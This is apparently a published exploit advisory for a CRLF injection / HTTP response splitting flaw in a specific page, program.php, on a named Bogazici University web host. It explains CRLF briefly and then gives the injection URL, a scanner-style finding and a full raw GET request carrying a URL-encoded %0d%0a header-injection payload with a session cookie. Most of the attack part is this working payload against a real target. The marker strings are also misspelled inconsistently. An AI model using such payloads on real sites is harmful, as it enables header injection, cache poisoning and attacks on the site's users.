################################################################### # Exploit Title : Bogazici University CRLF injection/HTTP response splitting # Author [ Discovered By ] : Furkan Özer # Date : 10/01/2020 # Vendor Homepage :ikincibahar.test.boun.edu.tr # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium ################################################################### What is CRLF? When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, i.e. the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF. The web server uses the CRLF to understand when new HTTP header begins and another one ends. The CRLF can also tell a web application or user that a new line begins in a file or in a text block. The CRLF characters are a standard HTTP/1.1 message, so it is used by any type of web server, including Apache, Microsoft IIS and all others. ################################################################### # Injection Exploit : ********************** /program.php?m=SomeCustomInjectedHeader:incetiononprototyqe ################################################################### # Example Vulnerable Sites : ************************* This vulnerability affects /program.php. Attack details URL encoded GET input m was set to SomeCustomInjectedHeader:injected_prototyqe Injected header found: SomeCustomInjectedHeader: injected_prototyqe ################################################################### GET /program.php?m=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_prototyqe HTTP/1.1 Cookie: PHPSESSID=2tv1ktlil5duru2nsg2ahpu551 Host: ikincibahar.test.boun.edu.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2 Accept: */*